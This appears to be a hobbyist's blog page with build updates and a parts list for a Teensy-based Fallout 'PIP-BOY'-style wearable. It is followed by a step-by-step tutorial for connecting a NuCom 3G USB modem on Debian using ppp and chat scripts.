http://www.conrad.nl/ce/nl/product/200240/Mipow-Powertube-2600-zwart-SP2600M-BK-Mipow-2600M-Mobiele-stroomvoorziening-reserve-batterij

I am planning on getting some more sensors now, thinking of :
-Compass/gps for my waypoint system (tomtom)
-Pulse-sensor, to detect 'health'
-FM module, it's not a PIP-BOY until you can listen to Three Dog barkin on the radiowaves.
-Some way for better audio (.wav files or alike)
 
Maybe I'll get a gyroscope as well, although I'm not sure yet how to incorporate it into the PIP-BOY.

The code currently contains 4 pages, only page 1 (terminal login) and page 2 (stats) are displayed in the video because page 3 (items) and 4 (data) are still empty.
Page 2 also is not completed yet, it displays everything up to menu Skills which hasnt been written yet.

I have added the VaultBoy images to the SD card, but I am currently rewriting the graphics library to support faster loading from SD.
Also, I still have to make all the functions actually work...
For instance: the RAD meter is static and is always at 12

A lot of work to do, but I'm not in a hurry ;)

click on the link below to follow the forum thread with much much more details:
http://forum.pjrc.com/threads/17717-PIP-GRL-31415-(not-spam!)

Update #1

PIP-GRL 31415 update #1

Some interface updates:

A lockscreen if the wrong password is entered 4x.

The radmeter now displays a random value (actually the average of 3 random values)

Replaced LVL/HP/AP/XP with battery, time/date and GPS lat&long indicator (only the batt. indicator isnt a true value)


GPS is working :P !!!!

I replaced my old pc-speaker with a new smaller one (one of those used in greeting cards)

Also, I managed to get the bmp display code working with the new SdFat library, so the final image you see of Vaultboy is loaded from MicroSD and displayed within 0.119 sec :P

List of items used:
http://pastebin.com/raw.php?i=eZutwJnw
Prices are in euro's, and the only thing not included in this list is the Teensy 3.0 itself...
Find the Teensy at http://www.pjrc.com/store/teensy3.html

Update #2

PIP-GRL 31415 update #2

A few more updates on the PIP-GRL software

-I made a quick settings menu
options are Mute on/off, goto Page 1, goto Page 2, goto Page 3, change hud_color and background_color
(I still need to rename the bottom row of colors to background instead of hud)
I open the settings menu by touching/pressing on the top right corner, there is a 10px/10px invisible square ;)

-Since the GPS now works and shows my accurate pos to the meter (even indoors) I have taken a map of the Netherlands, placed a 'you-are-here' square on top of my coordinates.
Once I have connected my compass I will replace the square with an arrow pointing in the direction I am facing.

-Page 2 and Page 3 are just copies of Page 1, and don't really function yet.
Page 1 = STATS
Page 2 = ITEMS
Page 3 = DATA
These pages will be opened by pressing a button, but since I don't want to mess with buttons while testing the interface, I created a quicklink in the settings window

Sorry about the quality of the videos, I need a better cam

Update #3

PIP-GRL 31415 update #3

A few more (small) updates:

-I got the microphone working, and made a simple volume meter.
-I have connected a laserpointer which is controlled by an 16bit I/O expander on the I2C bus.
-I have a compass connected and working, but I have not made a visual interface for it yet, its purely code at the moment.
-The same is for my pulse sensor, it works in code, but I have not created a visual interface for it.
-I also connected 2 ultra-bright LED's to the I/O expander, so I can illuminate any room at will.

For both the compass and the pulse sensor I still need to do some calibrating, so they work within a fair degree of accuracy.


Oh yeah, you can see the TFT backlight dim at the start of the video, I still want to use a digital switch for this.
For this I need a 60 cent item, which will have at least 5 euro deliverycosts, so I'll wait until I need more :)


P.S. I really need to make the invisible menu button larger :x

Update #4

PIP-GRL 31415 update #4

Some more updates

I have changed the Settings menu to have 4 tabs: Display, Audio, Controls, Gameplay
-In the Display section you can change the background and text color
-In the Audio section you can mute the speaker and turn on/off LED1-LED7 and the laserpointer (still need to move these to Controls)
The Audio section also contains the quicklinks to Page 1, 2 & 3 because I have not connected the buttons for them yet.

On Page 3 at the Misc menu I have added a Light Level Meter which I (badly) demonstrated by moving a flame closer to and away from the sensor.

Then on the Radio menu you can choose to turn on the radio itself.
If you do, a lot of options very similar to a stereo will appear:
Volume up and down, Seek up and down, Tune up and down and the option to mute the radio but keep it turned on.


P.S. The sound of the radio might sound terrible but that is because I have no speakers and I'm using my headphones at 10cm away from my mic...
It is actually quite good !

P.P.S. I do not own any of the songs that were broadcasted on the radio while recording this video, all copyrights go to those who deserve it etc. etc.

P.P.P.S. On the following page you can find my project wiki, which is the most comprehensive writeup on my project so far.
http://wiki.techinc.nl/index.php/PIP-GRL_31415

All components have been ordered from 7 different webshops: PJRC, EZtronics, Conrad, Floris.cc, Sparkfun Electronics, iPrototype.nl and AlphaCrucis.

On a sidenote:

I would rate all these webshops with 5/5 stars, with the exception of AlphaCrucis.
It took them 5 weeks to respond to my mail why my order wasn't sent (one of the items is not in stock), and another 3 weeks to realize that this particular item would not be resupplied.
This was when I finally received an email with the message 'your order has been shipped' and a second email with the message that a refund of somewhere around 3 euro have been initiated.
When I finally received my package and checked the invoice, it turned out I had waited 8 weeks for F/M jumper cables…

Tools

Sensors & modules

Product name & link In use Additional information
Triple Axis Accelerometer & Gyro yes in need of calibration
Triple Axis Accelerometer & Gyro yes in need of calibration
Line Tracking sensor no need to free pins and use 5v-3.3v logic level converter
Color Light Sensor no need to free PWM pins to connect RGB LED
Breakout voor Audio Plug no still needs to be soldered
Audio Plug female 3.5mm no still needs to be soldered
Adafruit Ultimate GPS Breakout - 66 channel w/10 Hz updates - V3 yes works quite well without external antenna
LSM303 Breakout Board - Tilt Compensated Compass yes needs calibrating
Humidity and Temperature Sensor - RHT03 no tested and works, but now unplugged to free pins for other uses
Logic Level Converter no not being used (yet)
8-channel Bi-directional Logic Level Converter - TXB0108 no not being used (yet)
MPL3115A2 Altitude/Pressure Sensor Breakout yes in need of calibration
SpeakJet no not connected, probably never will
Pulse Sensor no connected and worked, needs calibration, has been disconnected to free pins
Evaluation Board for Si4703 FM Tuner yes connected and works
Laser Card Module - Red yes connected through MCP23016 and works
Max Power IR LED Kit Max Power IR LED Kit no still needs to be soldered

Simple parts

Product name & link In use Additional information
Steekprintplaat EIC-102 (l x b x h) 165 x 55 x 8.5 mm Aantal poolklemmen 830 yes currently houses the project
Bedradingsset EIC-J-XL Set steekbruggen (l x b x h) 205 x 145 x 40 mm yes whats left is in the space
Mipow Powertube 2600, zwart SP2600M-BK Mipow 2600M mobiele oplader no works perfectly, but not useful while prototyping
Breadboard met Jumpwires yes holds whatever didn't fit on the main breadboard anymore (mainly I2C devices)
Premium Jumpwires M/F yes bag of 10, 2 are in use for the A10 & A11 pins on the Teensy
Digitale Sensor kabel no not being used
Analoge Sensor kabel no not being used
Mini Speaker no was connected, but had to unplug to free pin for other uses
3x LED Wit (Extra bright) yes connected through the MCP23016 expander
20 in 1!Basic components mixed pack no unopened in my box in the space, still need to sort and put in proper storage boxes
6x Solderless Headers - 10-pin Straight yes a lot of these have been used, very useful buggers
2x Breadboard wire bundle yes same as above, 1 pack has been used, the other is in the jumperwire storage box
Black Metal Knob - 14x24mm no not being used, doesn't fit on my potentiometer
Key Switch - Small no not being used yet, one of the final things to be added
Coin Cell Battery - 20mm no tested and works, currently searching for a nice holder
10K Breadboard Potentiometer yes is being used to dim the TFT backlight
Surface Transducer - Small no not in use yet, needs soldering of two tiny pads
Electret Microphone Amplifier - MAX4466 with Adjustable Gain yes in use for the audio volume meter
LED Light Pipe 0.6" Round no not being used, not sure if it will either
3x LED Tactile Button - Red no haven't got a clue how to connect these at the moment
Resistor Kit - 1/4W (500 total) yes very useful, although I'm not sure why (only 20) http://en.wikipedia.org/wiki/Zero-ohm_link 0 Ohm resistors are included…

Advanced parts

Product name & link In use Additional information
Teensy USB Board, Version 3.0, with Header Pins yes the beating heart of this project.. connected and works :)
Micro SD Card Adaptor yes works very well, using http://code.google.com/p/beta-lib/downloads/list SdFat beta (SdFatBeta20130207.zip) for optimized speed
Pin Expander (MCP23016) yes connected and works for output, need to use scope to test input
I2C Bus Expander (PCF8574AN) no not being used yet
Light Dependent Resistor yes in use, works very well
Breadboard Power Supply USB - 5V/3.3V yes one of the best purchases I made, powers the breadboard with 5v on the top rail, and 3.3v on the bottom rail
MCP23017 - i2c 16 input/output port expander no not being used, had some issues connecting this, although its said to be faster/better
MOSFET Power Control Kit no still needs soldering
10x Resettable Fuse PTC yes a few of these have been connected (TFT screen & compass module)
Crystal 32kHz no needs to be soldered to the Teensy
2.8" 18-bit color TFT LCD with touchscreen breakout board - ILI9325 yes works excellent, bought from http://www.eztronics.nl/ EZtronics but is no longer available there/on the site

Coming soon, to a theatre near you, in 3D with Dolby Surround.


Coming soon part 2: Coming sooner!


Coming Soon part 3: Revenge of those left behind!


Coming Soon part 0.5: When ignorance was bliss!


Since some time I've been blessed with a new internet connection with Internet Service Provider called UPC.
Along with this static/permanent connection at home I also applied for mobile internet, using an USB dongle made by NuCom HK.
According to the ladies and gentlemen at UPC, this device can only be used in Windows because there are no drivers available for *nix support…

Well, I'm here to tell you otherwise !

First off some info on the device itself :

Name : NU-WU200 WCDMA/HSPA+ USB Modem
Manufacturer : NuCom HK
Chipset : Qualcomm 8200A
NAND+SDRAM: 512MB+256MB
Antenna: Built-in Monopole antenna
Frequency range: 824-960MHz & 1710-2170 MHz
SIM/USIM card: Standard SIM card interface, in line with the 3GPP31.101 and 31.102
Size: 80mm * 25mm * 10.5mm
Weight: 22g

Support the HSPA / UMTS (2100/900MHz), GSM / GPRS / EDGE (850/900/1800/1900MHz).
Support for HSDPA+(21 Mbps), HSUPA(5.76 Mbps), UMTS (384 Kbps), EDGE (237 Kbps), GPRS (85.6 Kbps).
Support for Data Service, SMS, PIN management, Phone book business, Volume Statistics, PC Voice (optional).

All very interesting, but not why you're reading this blog entry I guess, so lets move on to the installation :)

  1. Boot up your Debian machine, start a terminal and connect your USB dongle.
  2. Wait until the light on the USB dongle is flashing green.
  3. Run 'lsusb' and verify your device has been recognized (the device without a description):
    lsusb
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
    Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 001 Device 013: ID 2077:9000 <------------------
    Bus 001 Device 004: ID 13d3:5119 IMC Networks 
    Bus 003 Device 002: ID 046d:c01e Logitech, Inc. MX518 Optical Mouse

    Notice that the USB dongle has no device information listed.

  4. Run 'dmesg' to find out where the device is located in your /dev list :
    dmesg
    [81619.836116] usb 1-1: new high-speed USB device number 14 using ehci_hcd
    [81619.971069] usb 1-1: New USB device found, idVendor=2077, idProduct=f000
    [81619.971084] usb 1-1: New USB device strings: Mfr=3, Product=2, SerialNumber=4
    [81619.971094] usb 1-1: Product: 3G DataCard Modem
    [81619.971102] usb 1-1: Manufacturer: 
    [81619.971110] usb 1-1: SerialNumber: 352767040228502
    [81619.994861] scsi12 : usb-storage 1-1:1.0
    [81620.994486] scsi 12:0:0:0: CD-ROM 3G Modem Mass Storage 2.31 PQ: 0 ANSI: 2
    [81621.001861] sr0: scsi-1 drive
    [81621.003113] sr 12:0:0:0: Attached scsi CD-ROM sr0
    [81621.004581] sr 12:0:0:0: Attached scsi generic sg1 type 5
    [81621.216695] usb 1-1: USB disconnect, device number 14
    [81621.584119] usb 1-1: new high-speed USB device number 15 using ehci_hcd
    [81621.719506] usb 1-1: New USB device found, idVendor=2077, idProduct=9000
    [81621.719521] usb 1-1: New USB device strings: Mfr=3, Product=2, SerialNumber=4
    [81621.719531] usb 1-1: Product: 3G DataCard Modem
    [81621.719539] usb 1-1: Manufacturer: 
    [81621.719547] usb 1-1: SerialNumber: 352767040228502
    [81621.743255] option 1-1:1.0: GSM modem (1-port) converter detected
    [81621.743644] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB0
    [81621.744665] option 1-1:1.1: GSM modem (1-port) converter detected
    [81621.745025] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB1
    [81621.745644] scsi13 : usb-storage 1-1:1.2
    [81621.746458] option 1-1:1.3: GSM modem (1-port) converter detected
    [81621.746869] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB2
    [81622.746052] scsi 13:0:0:0: Direct-Access 3G Modem Mass Storage 2.31 PQ: 0 ANSI: 2
    [81622.750890] sd 13:0:0:0: Attached scsi generic sg1 type 0
    [81622.754045] sd 13:0:0:0: [sdb] Attached SCSI removable disk

    Now we know that the device uses the following /dev entries: ttyUSB0, ttyUSB1 & ttyUSB2. (this device is a composition of multiple devices, a PPP adapter, the USB adapter and a storage module)

  5. Run 'nano /etc/chatscripts/3g' (this file shouldnt exist yet)
  6. Enter the following details :
    ABORT BUSY
    ABORT 'NO CARRIER'
    ABORT ERROR
    REPORT CONNECT
    "" \rAT
    OK 'AT+CGDCONT=1,"IP","UPC.dataxs.mobi"'
    OK ATD*99***1#
    CONNECT ""
  7. Run 'nano /etc/ppp/peers/hsdpa-provider' (this file shouldnt exist yet either)
  8. Enter the following details :
    /dev/ttyUSB2
    115200
    crtscts
    local
    noipdefault
    defaultroute
    usepeerdns
    noauth
    passive
    connect "/usr/sbin/chat -v -f /etc/chatscripts/3g"
    user test
    ipcp-accept-remote
    ipcp-accept-local

    So far it seems that user/pass are not required to make the connection, so I used test as username.

  9. Run 'pon hsdpa-provider'
  10. Wait a few seconds until you see that the green light on your USB dongle has stopped flashing and burns continuously
  11. Run 'ifconfig -a' and check if there is a PPP interface listed

If all is well you should have received an ipaddress and be able to connect to the internet :)

ppp0 Link encap:Point-to-Point Protocol 
inet addr:10.*.*.* P-t-P:10.*.*.* Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3 
RX bytes:158 (158.0 B) TX bytes:221 (221.0 B)
  • To connect, run 'pon hsdpa-provider'
  • To disconnect, run 'poff hsdpa-provider'
  • I believe these commands aren't too easy to remember, so I made 2 files in /usr/bin called 3g-on and 3g-off with these commands inside them.

Don't forget to chmod +x these files if you do the same…

Something worth mentioning about this configuration…
On line 6 of /etc/chatscripts/3g we entered the line :

OK 'AT+CGDCONT=1,"IP","UPC.dataxs.mobi"'

The last part (upc.dataxs.mobi) is the PPP authentication server (APN), this might be different for you!
To check your auth. server connect and install the device in Windows and check the settings/options.

Coming soon, sending (free) SMS text messages using this device :)



1)
look into Electric IMP